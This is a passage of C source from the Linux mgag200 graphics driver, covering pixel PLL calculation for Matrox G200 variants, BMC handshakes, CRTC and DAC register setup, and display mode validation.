permitteddelta) { pr_warn("PLL delta too large\n"); return 1; } WREG_MISC_MASKED(MGAREG_MISC_CLKSEL_MGA, MGAREG_MISC_CLKSEL_MASK); WREG_DAC(MGA1064_PIX_PLLC_M, m); WREG_DAC(MGA1064_PIX_PLLC_N, n); WREG_DAC(MGA1064_PIX_PLLC_P, p); if (unique_rev_id >= 0x04) { WREG_DAC(0x1a, 0x09); msleep(20); WREG_DAC(0x1a, 0x01); } return 0; } static int mga_g200wb_set_plls(struct mga_device *mdev, long clock) { unsigned int vcomax, vcomin, pllreffreq; unsigned int delta, tmpdelta; unsigned int testp, testm, testn, testp2; unsigned int p, m, n; unsigned int computed; int i, j, tmpcount, vcount; bool pll_locked = false; u8 tmp; m = n = p = 0; delta = 0xffffffff; if (mdev->type == G200_EW3) { vcomax = 800000; vcomin = 400000; pllreffreq = 25000; for (testp = 1; testp < 8; testp++) { for (testp2 = 1; testp2 < 8; testp2++) { if (testp < testp2) continue; if ((clock * testp * testp2) > vcomax) continue; if ((clock * testp * testp2) < vcomin) continue; for (testm = 1; testm < 26; testm++) { for (testn = 32; testn < 2048 ; testn++) { computed = (pllreffreq * testn) / (testm * testp * testp2); if (computed > clock) tmpdelta = computed - clock; else tmpdelta = clock - computed; if (tmpdelta < delta) { delta = tmpdelta; m = ((testn & 0x100) >> 1) | (testm); n = (testn & 0xFF); p = ((testn & 0x600) >> 3) | (testp2 << 3) | (testp); } } } } } } else { vcomax = 550000; vcomin = 150000; pllreffreq = 48000; for (testp = 1; testp < 9; testp++) { if (clock * testp > vcomax) continue; if (clock * testp < vcomin) continue; for (testm = 1; testm < 17; testm++) { for (testn = 1; testn < 151; testn++) { computed = (pllreffreq * testn) / (testm * testp); if (computed > clock) tmpdelta = computed - clock; else tmpdelta = clock - computed; if (tmpdelta < delta) { delta = tmpdelta; n = testn - 1; m = (testm - 1) | ((n >> 1) & 0x80); p = testp - 1; } } } } } WREG_MISC_MASKED(MGAREG_MISC_CLKSEL_MGA, MGAREG_MISC_CLKSEL_MASK); for (i = 0; i <= 32 && pll_locked == false; i++) { if (i > 0) { WREG8(MGAREG_CRTC_INDEX, 0x1e); tmp = RREG8(MGAREG_CRTC_DATA); if (tmp < 0xff) WREG8(MGAREG_CRTC_DATA, tmp+1); } /* set pixclkdis to 1 */ WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_DIS; WREG8(DAC_DATA, tmp); WREG8(DAC_INDEX, MGA1064_REMHEADCTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_REMHEADCTL_CLKDIS; WREG8(DAC_DATA, tmp); /* select PLL Set C */ tmp = RREG8(MGAREG_MEM_MISC_READ); tmp |= 0x3 << 2; WREG8(MGAREG_MEM_MISC_WRITE, tmp); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_POW_DOWN | 0x80; WREG8(DAC_DATA, tmp); udelay(500); /* reset the PLL */ WREG8(DAC_INDEX, MGA1064_VREF_CTL); tmp = RREG8(DAC_DATA); tmp &= ~0x04; WREG8(DAC_DATA, tmp); udelay(50); /* program pixel pll register */ WREG_DAC(MGA1064_WB_PIX_PLLC_N, n); WREG_DAC(MGA1064_WB_PIX_PLLC_M, m); WREG_DAC(MGA1064_WB_PIX_PLLC_P, p); udelay(50); /* turn pll on */ WREG8(DAC_INDEX, MGA1064_VREF_CTL); tmp = RREG8(DAC_DATA); tmp |= 0x04; WREG_DAC(MGA1064_VREF_CTL, tmp); udelay(500); /* select the pixel pll */ WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_SEL_MSK; tmp |= MGA1064_PIX_CLK_CTL_SEL_PLL; WREG8(DAC_DATA, tmp); WREG8(DAC_INDEX, MGA1064_REMHEADCTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_REMHEADCTL_CLKSL_MSK; tmp |= MGA1064_REMHEADCTL_CLKSL_PLL; WREG8(DAC_DATA, tmp); /* reset dotclock rate bit */ WREG8(MGAREG_SEQ_INDEX, 1); tmp = RREG8(MGAREG_SEQ_DATA); tmp &= ~0x8; WREG8(MGAREG_SEQ_DATA, tmp); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_CLK_DIS; WREG8(DAC_DATA, tmp); vcount = RREG8(MGAREG_VCOUNT); for (j = 0; j < 30 && pll_locked == false; j++) { tmpcount = RREG8(MGAREG_VCOUNT); if (tmpcount < vcount) vcount = 0; if ((tmpcount - vcount) > 2) pll_locked = true; else udelay(5); } } WREG8(DAC_INDEX, MGA1064_REMHEADCTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_REMHEADCTL_CLKDIS; WREG_DAC(MGA1064_REMHEADCTL, tmp); return 0; } static int mga_g200ev_set_plls(struct mga_device *mdev, long clock) { unsigned int vcomax, vcomin, pllreffreq; unsigned int delta, tmpdelta; unsigned int testp, testm, testn; unsigned int p, m, n; unsigned int computed; u8 tmp; m = n = p = 0; vcomax = 550000; vcomin = 150000; pllreffreq = 50000; delta = 0xffffffff; for (testp = 16; testp > 0; testp--) { if (clock * testp > vcomax) continue; if (clock * testp < vcomin) continue; for (testn = 1; testn < 257; testn++) { for (testm = 1; testm < 17; testm++) { computed = (pllreffreq * testn) / (testm * testp); if (computed > clock) tmpdelta = computed - clock; else tmpdelta = clock - computed; if (tmpdelta < delta) { delta = tmpdelta; n = testn - 1; m = testm - 1; p = testp - 1; } } } } WREG_MISC_MASKED(MGAREG_MISC_CLKSEL_MGA, MGAREG_MISC_CLKSEL_MASK); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_DIS; WREG8(DAC_DATA, tmp); tmp = RREG8(MGAREG_MEM_MISC_READ); tmp |= 0x3 << 2; WREG8(MGAREG_MEM_MISC_WRITE, tmp); WREG8(DAC_INDEX, MGA1064_PIX_PLL_STAT); tmp = RREG8(DAC_DATA); WREG8(DAC_DATA, tmp & ~0x40); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_POW_DOWN; WREG8(DAC_DATA, tmp); WREG_DAC(MGA1064_EV_PIX_PLLC_M, m); WREG_DAC(MGA1064_EV_PIX_PLLC_N, n); WREG_DAC(MGA1064_EV_PIX_PLLC_P, p); udelay(50); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_CLK_POW_DOWN; WREG8(DAC_DATA, tmp); udelay(500); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_SEL_MSK; tmp |= MGA1064_PIX_CLK_CTL_SEL_PLL; WREG8(DAC_DATA, tmp); WREG8(DAC_INDEX, MGA1064_PIX_PLL_STAT); tmp = RREG8(DAC_DATA); WREG8(DAC_DATA, tmp | 0x40); tmp = RREG8(MGAREG_MEM_MISC_READ); tmp |= (0x3 << 2); WREG8(MGAREG_MEM_MISC_WRITE, tmp); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_CLK_DIS; WREG8(DAC_DATA, tmp); return 0; } static int mga_g200eh_set_plls(struct mga_device *mdev, long clock) { unsigned int vcomax, vcomin, pllreffreq; unsigned int delta, tmpdelta; unsigned int testp, testm, testn; unsigned int p, m, n; unsigned int computed; int i, j, tmpcount, vcount; u8 tmp; bool pll_locked = false; m = n = p = 0; if (mdev->type == G200_EH3) { vcomax = 3000000; vcomin = 1500000; pllreffreq = 25000; delta = 0xffffffff; testp = 0; for (testm = 150; testm >= 6; testm--) { if (clock * testm > vcomax) continue; if (clock * testm < vcomin) continue; for (testn = 120; testn >= 60; testn--) { computed = (pllreffreq * testn) / testm; if (computed > clock) tmpdelta = computed - clock; else tmpdelta = clock - computed; if (tmpdelta < delta) { delta = tmpdelta; n = testn; m = testm; p = testp; } if (delta == 0) break; } if (delta == 0) break; } } else { vcomax = 800000; vcomin = 400000; pllreffreq = 33333; delta = 0xffffffff; for (testp = 16; testp > 0; testp >>= 1) { if (clock * testp > vcomax) continue; if (clock * testp < vcomin) continue; for (testm = 1; testm < 33; testm++) { for (testn = 17; testn < 257; testn++) { computed = (pllreffreq * testn) / (testm * testp); if (computed > clock) tmpdelta = computed - clock; else tmpdelta = clock - computed; if (tmpdelta < delta) { delta = tmpdelta; n = testn - 1; m = (testm - 1); p = testp - 1; } if ((clock * testp) >= 600000) p |= 0x80; } } } } WREG_MISC_MASKED(MGAREG_MISC_CLKSEL_MGA, MGAREG_MISC_CLKSEL_MASK); for (i = 0; i <= 32 && pll_locked == false; i++) { WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_DIS; WREG8(DAC_DATA, tmp); tmp = RREG8(MGAREG_MEM_MISC_READ); tmp |= 0x3 << 2; WREG8(MGAREG_MEM_MISC_WRITE, tmp); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_POW_DOWN; WREG8(DAC_DATA, tmp); udelay(500); WREG_DAC(MGA1064_EH_PIX_PLLC_M, m); WREG_DAC(MGA1064_EH_PIX_PLLC_N, n); WREG_DAC(MGA1064_EH_PIX_PLLC_P, p); udelay(500); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_SEL_MSK; tmp |= MGA1064_PIX_CLK_CTL_SEL_PLL; WREG8(DAC_DATA, tmp); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_CLK_DIS; tmp &= ~MGA1064_PIX_CLK_CTL_CLK_POW_DOWN; WREG8(DAC_DATA, tmp); vcount = RREG8(MGAREG_VCOUNT); for (j = 0; j < 30 && pll_locked == false; j++) { tmpcount = RREG8(MGAREG_VCOUNT); if (tmpcount < vcount) vcount = 0; if ((tmpcount - vcount) > 2) pll_locked = true; else udelay(5); } } return 0; } static int mga_g200er_set_plls(struct mga_device *mdev, long clock) { unsigned int vcomax, vcomin, pllreffreq; unsigned int delta, tmpdelta; int testr, testn, testm, testo; unsigned int p, m, n; unsigned int computed, vco; int tmp; const unsigned int m_div_val[] = { 1, 2, 4, 8 }; m = n = p = 0; vcomax = 1488000; vcomin = 1056000; pllreffreq = 48000; delta = 0xffffffff; for (testr = 0; testr < 4; testr++) { if (delta == 0) break; for (testn = 5; testn < 129; testn++) { if (delta == 0) break; for (testm = 3; testm >= 0; testm--) { if (delta == 0) break; for (testo = 5; testo < 33; testo++) { vco = pllreffreq * (testn + 1) / (testr + 1); if (vco < vcomin) continue; if (vco > vcomax) continue; computed = vco / (m_div_val[testm] * (testo + 1)); if (computed > clock) tmpdelta = computed - clock; else tmpdelta = clock - computed; if (tmpdelta < delta) { delta = tmpdelta; m = testm | (testo << 3); n = testn; p = testr | (testr << 3); } } } } } WREG_MISC_MASKED(MGAREG_MISC_CLKSEL_MGA, MGAREG_MISC_CLKSEL_MASK); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_DIS; WREG8(DAC_DATA, tmp); WREG8(DAC_INDEX, MGA1064_REMHEADCTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_REMHEADCTL_CLKDIS; WREG8(DAC_DATA, tmp); tmp = RREG8(MGAREG_MEM_MISC_READ); tmp |= (0x3<<2) | 0xc0; WREG8(MGAREG_MEM_MISC_WRITE, tmp); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_CLK_DIS; tmp |= MGA1064_PIX_CLK_CTL_CLK_POW_DOWN; WREG8(DAC_DATA, tmp); udelay(500); WREG_DAC(MGA1064_ER_PIX_PLLC_N, n); WREG_DAC(MGA1064_ER_PIX_PLLC_M, m); WREG_DAC(MGA1064_ER_PIX_PLLC_P, p); udelay(50); return 0; } static int mgag200_crtc_set_plls(struct mga_device *mdev, long clock) { switch(mdev->type) { case G200_PCI: case G200_AGP: return mgag200_g200_set_plls(mdev, clock); case G200_SE_A: case G200_SE_B: return mga_g200se_set_plls(mdev, clock); break; case G200_WB: case G200_EW3: return mga_g200wb_set_plls(mdev, clock); break; case G200_EV: return mga_g200ev_set_plls(mdev, clock); break; case G200_EH: case G200_EH3: return mga_g200eh_set_plls(mdev, clock); break; case G200_ER: return mga_g200er_set_plls(mdev, clock); break; } return 0; } static void mgag200_g200wb_hold_bmc(struct mga_device *mdev) { u8 tmp; int iter_max; /* 1- The first step is to warn the BMC of an upcoming mode change. * We are putting the misc<0> to output.*/ WREG8(DAC_INDEX, MGA1064_GEN_IO_CTL); tmp = RREG8(DAC_DATA); tmp |= 0x10; WREG_DAC(MGA1064_GEN_IO_CTL, tmp); /* we are putting a 1 on the misc<0> line */ WREG8(DAC_INDEX, MGA1064_GEN_IO_DATA); tmp = RREG8(DAC_DATA); tmp |= 0x10; WREG_DAC(MGA1064_GEN_IO_DATA, tmp); /* 2- Second step to mask and further scan request * This will be done by asserting the remfreqmsk bit (XSPAREREG<7>) */ WREG8(DAC_INDEX, MGA1064_SPAREREG); tmp = RREG8(DAC_DATA); tmp |= 0x80; WREG_DAC(MGA1064_SPAREREG, tmp); /* 3a- the third step is to verifu if there is an active scan * We are searching for a 0 on remhsyncsts <XSPAREREG<0>) */ iter_max = 300; while (!(tmp & 0x1) && iter_max) { WREG8(DAC_INDEX, MGA1064_SPAREREG); tmp = RREG8(DAC_DATA); udelay(1000); iter_max--; } /* 3b- this step occurs only if the remove is actually scanning * we are waiting for the end of the frame which is a 1 on * remvsyncsts (XSPAREREG<1>) */ if (iter_max) { iter_max = 300; while ((tmp & 0x2) && iter_max) { WREG8(DAC_INDEX, MGA1064_SPAREREG); tmp = RREG8(DAC_DATA); udelay(1000); iter_max--; } } } static void mgag200_g200wb_release_bmc(struct mga_device *mdev) { u8 tmp; /* 1- The first step is to ensure that the vrsten and hrsten are set */ WREG8(MGAREG_CRTCEXT_INDEX, 1); tmp = RREG8(MGAREG_CRTCEXT_DATA); WREG8(MGAREG_CRTCEXT_DATA, tmp | 0x88); /* 2- second step is to assert the rstlvl2 */ WREG8(DAC_INDEX, MGA1064_REMHEADCTL2); tmp = RREG8(DAC_DATA); tmp |= 0x8; WREG8(DAC_DATA, tmp); /* wait 10 us */ udelay(10); /* 3- deassert rstlvl2 */ tmp &= ~0x08; WREG8(DAC_INDEX, MGA1064_REMHEADCTL2); WREG8(DAC_DATA, tmp); /* 4- remove mask of scan request */ WREG8(DAC_INDEX, MGA1064_SPAREREG); tmp = RREG8(DAC_DATA); tmp &= ~0x80; WREG8(DAC_DATA, tmp); /* 5- put back a 0 on the misc<0> line */ WREG8(DAC_INDEX, MGA1064_GEN_IO_DATA); tmp = RREG8(DAC_DATA); tmp &= ~0x10; WREG_DAC(MGA1064_GEN_IO_DATA, tmp); } /* * This is how the framebuffer base address is stored in g200 cards: * * Assume @offset is the gpu_addr variable of the framebuffer object * * Then addr is the number of _pixels_ (not bytes) from the start of * VRAM to the first pixel we want to display. (divided by 2 for 32bit * framebuffers) * * addr is stored in the CRTCEXT0, CRTCC and CRTCD registers * addr<20> -> CRTCEXT0<6> * addr<19-16> -> CRTCEXT0<3-0> * addr<15-8> -> CRTCC<7-0> * addr<7-0> -> CRTCD<7-0> * * CRTCEXT0 has to be programmed last to trigger an update and make the * new addr variable take effect. */ static void mgag200_set_startadd(struct mga_device *mdev, unsigned long offset) { struct drm_device *dev = &mdev->base; u32 startadd; u8 crtcc, crtcd, crtcext0; startadd = offset / 8; /* * Can't store addresses any higher than that, but we also * don't have more than 16 MiB of memory, so it should be fine. */ drm_WARN_ON(dev, startadd > 0x1fffff); RREG_ECRT(0x00, crtcext0); crtcc = (startadd >> 8) & 0xff; crtcd = startadd & 0xff; crtcext0 &= 0xb0; crtcext0 |= ((startadd >> 14) & BIT(6)) | ((startadd >> 16) & 0x0f); WREG_CRT(0x0c, crtcc); WREG_CRT(0x0d, crtcd); WREG_ECRT(0x00, crtcext0); } static void mgag200_set_dac_regs(struct mga_device *mdev) { size_t i; u8 dacvalue[] = { /* 0x00: */ 0, 0, 0, 0, 0, 0, 0x00, 0, /* 0x08: */ 0, 0, 0, 0, 0, 0, 0, 0, /* 0x10: */ 0, 0, 0, 0, 0, 0, 0, 0, /* 0x18: */ 0x00, 0, 0xC9, 0xFF, 0xBF, 0x20, 0x1F, 0x20, /* 0x20: */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 0x28: */ 0x00, 0x00, 0x00, 0x00, 0, 0, 0, 0x40, /* 0x30: */ 0x00, 0xB0, 0x00, 0xC2, 0x34, 0x14, 0x02, 0x83, /* 0x38: */ 0x00, 0x93, 0x00, 0x77, 0x00, 0x00, 0x00, 0x3A, /* 0x40: */ 0, 0, 0, 0, 0, 0, 0, 0, /* 0x48: */ 0, 0, 0, 0, 0, 0, 0, 0 }; switch (mdev->type) { case G200_PCI: case G200_AGP: dacvalue[MGA1064_SYS_PLL_M] = 0x04; dacvalue[MGA1064_SYS_PLL_N] = 0x2D; dacvalue[MGA1064_SYS_PLL_P] = 0x19; break; case G200_SE_A: case G200_SE_B: dacvalue[MGA1064_VREF_CTL] = 0x03; dacvalue[MGA1064_PIX_CLK_CTL] = MGA1064_PIX_CLK_CTL_SEL_PLL; dacvalue[MGA1064_MISC_CTL] = MGA1064_MISC_CTL_DAC_EN | MGA1064_MISC_CTL_VGA8 | MGA1064_MISC_CTL_DAC_RAM_CS; break; case G200_WB: case G200_EW3: dacvalue[MGA1064_VREF_CTL] = 0x07; break; case G200_EV: dacvalue[MGA1064_PIX_CLK_CTL] = MGA1064_PIX_CLK_CTL_SEL_PLL; dacvalue[MGA1064_MISC_CTL] = MGA1064_MISC_CTL_VGA8 | MGA1064_MISC_CTL_DAC_RAM_CS; break; case G200_EH: case G200_EH3: dacvalue[MGA1064_MISC_CTL] = MGA1064_MISC_CTL_VGA8 | MGA1064_MISC_CTL_DAC_RAM_CS; break; case G200_ER: break; } for (i = 0; i < ARRAY_SIZE(dacvalue); i++) { if ((i <= 0x17) || (i == 0x1b) || (i == 0x1c) || ((i >= 0x1f) && (i <= 0x29)) || ((i >= 0x30) && (i <= 0x37))) continue; if (IS_G200_SE(mdev) && ((i == 0x2c) || (i == 0x2d) || (i == 0x2e))) continue; if ((mdev->type == G200_EV || mdev->type == G200_WB || mdev->type == G200_EH || mdev->type == G200_EW3 || mdev->type == G200_EH3) && (i >= 0x44) && (i <= 0x4e)) continue; WREG_DAC(i, dacvalue[i]); } if (mdev->type == G200_ER) WREG_DAC(0x90, 0); } static void mgag200_init_regs(struct mga_device *mdev) { u8 crtc11, misc; mgag200_set_dac_regs(mdev); WREG_SEQ(2, 0x0f); WREG_SEQ(3, 0x00); WREG_SEQ(4, 0x0e); WREG_CRT(10, 0); WREG_CRT(11, 0); WREG_CRT(12, 0); WREG_CRT(13, 0); WREG_CRT(14, 0); WREG_CRT(15, 0); RREG_CRT(0x11, crtc11); crtc11 &= ~(MGAREG_CRTC11_CRTCPROTECT | MGAREG_CRTC11_VINTEN | MGAREG_CRTC11_VINTCLR); WREG_CRT(0x11, crtc11); if (mdev->type == G200_ER) WREG_ECRT(0x24, 0x5); if (mdev->type == G200_EW3) WREG_ECRT(0x34, 0x5); misc = RREG8(MGA_MISC_IN); misc |= MGAREG_MISC_IOADSEL; WREG8(MGA_MISC_OUT, misc); } static void mgag200_set_mode_regs(struct mga_device *mdev, const struct drm_display_mode *mode) { unsigned int hdisplay, hsyncstart, hsyncend, htotal; unsigned int vdisplay, vsyncstart, vsyncend, vtotal; u8 misc, crtcext1, crtcext2, crtcext5; hdisplay = mode->hdisplay / 8 - 1; hsyncstart = mode->hsync_start / 8 - 1; hsyncend = mode->hsync_end / 8 - 1; htotal = mode->htotal / 8 - 1; /* Work around hardware quirk */ if ((htotal & 0x07) == 0x06 || (htotal & 0x07) == 0x04) htotal++; vdisplay = mode->vdisplay - 1; vsyncstart = mode->vsync_start - 1; vsyncend = mode->vsync_end - 1; vtotal = mode->vtotal - 2; misc = RREG8(MGA_MISC_IN); if (mode->flags & DRM_MODE_FLAG_NHSYNC) misc |= MGAREG_MISC_HSYNCPOL; else misc &= ~MGAREG_MISC_HSYNCPOL; if (mode->flags & DRM_MODE_FLAG_NVSYNC) misc |= MGAREG_MISC_VSYNCPOL; else misc &= ~MGAREG_MISC_VSYNCPOL; crtcext1 = (((htotal - 4) & 0x100) >> 8) | ((hdisplay & 0x100) >> 7) | ((hsyncstart & 0x100) >> 6) | (htotal & 0x40); if (mdev->type == G200_WB || mdev->type == G200_EW3) crtcext1 |= BIT(7) | /* vrsten */ BIT(3); /* hrsten */ crtcext2 = ((vtotal & 0xc00) >> 10) | ((vdisplay & 0x400) >> 8) | ((vdisplay & 0xc00) >> 7) | ((vsyncstart & 0xc00) >> 5) | ((vdisplay & 0x400) >> 3); crtcext5 = 0x00; WREG_CRT(0, htotal - 4); WREG_CRT(1, hdisplay); WREG_CRT(2, hdisplay); WREG_CRT(3, (htotal & 0x1F) | 0x80); WREG_CRT(4, hsyncstart); WREG_CRT(5, ((htotal & 0x20) << 2) | (hsyncend & 0x1F)); WREG_CRT(6, vtotal & 0xFF); WREG_CRT(7, ((vtotal & 0x100) >> 8) | ((vdisplay & 0x100) >> 7) | ((vsyncstart & 0x100) >> 6) | ((vdisplay & 0x100) >> 5) | ((vdisplay & 0x100) >> 4) | /* linecomp */ ((vtotal & 0x200) >> 4) | ((vdisplay & 0x200) >> 3) | ((vsyncstart & 0x200) >> 2)); WREG_CRT(9, ((vdisplay & 0x200) >> 4) | ((vdisplay & 0x200) >> 3)); WREG_CRT(16, vsyncstart & 0xFF); WREG_CRT(17, (vsyncend & 0x0F) | 0x20); WREG_CRT(18, vdisplay & 0xFF); WREG_CRT(20, 0); WREG_CRT(21, vdisplay & 0xFF); WREG_CRT(22, (vtotal + 1) & 0xFF); WREG_CRT(23, 0xc3); WREG_CRT(24, vdisplay & 0xFF); WREG_ECRT(0x01, crtcext1); WREG_ECRT(0x02, crtcext2); WREG_ECRT(0x05, crtcext5); WREG8(MGA_MISC_OUT, misc); } static u8 mgag200_get_bpp_shift(struct mga_device *mdev, const struct drm_format_info *format) { return mdev->bpp_shifts[format->cpp[0] - 1]; } /* * Calculates the HW offset value from the framebuffer's pitch. The * offset is a multiple of the pixel size and depends on the display * format. */ static u32 mgag200_calculate_offset(struct mga_device *mdev, const struct drm_framebuffer *fb) { u32 offset = fb->pitches[0] / fb->format->cpp[0]; u8 bppshift = mgag200_get_bpp_shift(mdev, fb->format); if (fb->format->cpp[0] * 8 == 24) offset = (offset * 3) >> (4 - bppshift); else offset = offset >> (4 - bppshift); return offset; } static void mgag200_set_offset(struct mga_device *mdev, const struct drm_framebuffer *fb) { u8 crtc13, crtcext0; u32 offset = mgag200_calculate_offset(mdev, fb); RREG_ECRT(0, crtcext0); crtc13 = offset & 0xff; crtcext0 &= ~MGAREG_CRTCEXT0_OFFSET_MASK; crtcext0 |= (offset >> 4) & MGAREG_CRTCEXT0_OFFSET_MASK; WREG_CRT(0x13, crtc13); WREG_ECRT(0x00, crtcext0); } static void mgag200_set_format_regs(struct mga_device *mdev, const struct drm_framebuffer *fb) { struct drm_device *dev = &mdev->base; const struct drm_format_info *format = fb->format; unsigned int bpp, bppshift, scale; u8 crtcext3, xmulctrl; bpp = format->cpp[0] * 8; bppshift = mgag200_get_bpp_shift(mdev, format); switch (bpp) { case 24: scale = ((1 << bppshift) * 3) - 1; break; default: scale = (1 << bppshift) - 1; break; } RREG_ECRT(3, crtcext3); switch (bpp) { case 8: xmulctrl = MGA1064_MUL_CTL_8bits; break; case 16: if (format->depth == 15) xmulctrl = MGA1064_MUL_CTL_15bits; else xmulctrl = MGA1064_MUL_CTL_16bits; break; case 24: xmulctrl = MGA1064_MUL_CTL_24bits; break; case 32: xmulctrl = MGA1064_MUL_CTL_32_24bits; break; default: /* BUG: We should have caught this problem already. */ drm_WARN_ON(dev, "invalid format depth\n"); return; } crtcext3 &= ~GENMASK(2, 0); crtcext3 |= scale; WREG_DAC(MGA1064_MUL_CTL, xmulctrl); WREG_GFX(0, 0x00); WREG_GFX(1, 0x00); WREG_GFX(2, 0x00); WREG_GFX(3, 0x00); WREG_GFX(4, 0x00); WREG_GFX(5, 0x40); WREG_GFX(6, 0x05); WREG_GFX(7, 0x0f); WREG_GFX(8, 0x0f); WREG_ECRT(3, crtcext3); } static void mgag200_g200er_reset_tagfifo(struct mga_device *mdev) { static uint32_t RESET_FLAG = 0x00200000; /* undocumented magic value */ u32 memctl; memctl = RREG32(MGAREG_MEMCTL); memctl |= RESET_FLAG; WREG32(MGAREG_MEMCTL, memctl); udelay(1000); memctl &= ~RESET_FLAG; WREG32(MGAREG_MEMCTL, memctl); } static void mgag200_g200se_set_hiprilvl(struct mga_device *mdev, const struct drm_display_mode *mode, const struct drm_framebuffer *fb) { u32 unique_rev_id = mdev->model.g200se.unique_rev_id; unsigned int hiprilvl; u8 crtcext6; if (unique_rev_id >= 0x04) { hiprilvl = 0; } else if (unique_rev_id >= 0x02) { unsigned int bpp; unsigned long mb; if (fb->format->cpp[0] * 8 > 16) bpp = 32; else if (fb->format->cpp[0] * 8 > 8) bpp = 16; else bpp = 8; mb = (mode->clock * bpp) / 1000; if (mb > 3100) hiprilvl = 0; else if (mb > 2600) hiprilvl = 1; else if (mb > 1900) hiprilvl = 2; else if (mb > 1160) hiprilvl = 3; else if (mb > 440) hiprilvl = 4; else hiprilvl = 5; } else if (unique_rev_id >= 0x01) { hiprilvl = 3; } else { hiprilvl = 4; } crtcext6 = hiprilvl; /* implicitly sets maxhipri to 0 */ WREG_ECRT(0x06, crtcext6); } static void mgag200_g200ev_set_hiprilvl(struct mga_device *mdev) { WREG_ECRT(0x06, 0x00); } static void mgag200_enable_display(struct mga_device *mdev) { u8 seq0, seq1, crtcext1; RREG_SEQ(0x00, seq0); seq0 |= MGAREG_SEQ0_SYNCRST | MGAREG_SEQ0_ASYNCRST; WREG_SEQ(0x00, seq0); /* * TODO: replace busy waiting with vblank IRQ; put * msleep(50) before changing SCROFF */ mga_wait_vsync(mdev); mga_wait_busy(mdev); RREG_SEQ(0x01, seq1); seq1 &= ~MGAREG_SEQ1_SCROFF; WREG_SEQ(0x01, seq1); msleep(20); RREG_ECRT(0x01, crtcext1); crtcext1 &= ~MGAREG_CRTCEXT1_VSYNCOFF; crtcext1 &= ~MGAREG_CRTCEXT1_HSYNCOFF; WREG_ECRT(0x01, crtcext1); } static void mgag200_disable_display(struct mga_device *mdev) { u8 seq0, seq1, crtcext1; RREG_SEQ(0x00, seq0); seq0 &= ~MGAREG_SEQ0_SYNCRST; WREG_SEQ(0x00, seq0); /* * TODO: replace busy waiting with vblank IRQ; put * msleep(50) before changing SCROFF */ mga_wait_vsync(mdev); mga_wait_busy(mdev); RREG_SEQ(0x01, seq1); seq1 |= MGAREG_SEQ1_SCROFF; WREG_SEQ(0x01, seq1); msleep(20); RREG_ECRT(0x01, crtcext1); crtcext1 |= MGAREG_CRTCEXT1_VSYNCOFF | MGAREG_CRTCEXT1_HSYNCOFF; WREG_ECRT(0x01, crtcext1); } /* * Connector */ static int mga_vga_get_modes(struct drm_connector *connector) { struct mga_connector *mga_connector = to_mga_connector(connector); struct edid *edid; int ret = 0; edid = drm_get_edid(connector, &mga_connector->i2c->adapter); if (edid) { drm_connector_update_edid_property(connector, edid); ret = drm_add_edid_modes(connector, edid); kfree(edid); } return ret; } static uint32_t mga_vga_calculate_mode_bandwidth(struct drm_display_mode *mode, int bits_per_pixel) { uint32_t total_area, divisor; uint64_t active_area, pixels_per_second, bandwidth; uint64_t bytes_per_pixel = (bits_per_pixel + 7) / 8; divisor = 1024; if (!mode->htotal || !mode->vtotal || !mode->clock) return 0; active_area = mode->hdisplay * mode->vdisplay; total_area = mode->htotal * mode->vtotal; pixels_per_second = active_area * mode->clock * 1000; do_div(pixels_per_second, total_area); bandwidth = pixels_per_second * bytes_per_pixel * 100; do_div(bandwidth, divisor); return (uint32_t)(bandwidth); } #define MODE_BANDWIDTH MODE_BAD static enum drm_mode_status mga_vga_mode_valid(struct drm_connector *connector, struct drm_display_mode *mode) { struct drm_device *dev = connector->dev; struct mga_device *mdev = to_mga_device(dev); int bpp = 32; if (IS_G200_SE(mdev)) { u32 unique_rev_id = mdev->model.g200se.unique_rev_id; if (unique_rev_id == 0x01) { if (mode->hdisplay > 1600) return MODE_VIRTUAL_X; if (mode->vdisplay > 1200) return MODE_VIRTUAL_Y; if (mga_vga_calculate_mode_bandwidth(mode, bpp) > (24400 * 1024)) return MODE_BANDWIDTH; } else if (unique_rev_id == 0x02) { if (mode->hdisplay > 1920) return MODE_VIRTUAL_X; if (mode->vdisplay > 1200) return MODE_VIRTUAL_Y; if (mga_vga_calculate_mode_bandwidth(mode, bpp) > (30100 * 1024)) return MODE_BANDWIDTH; } else { if 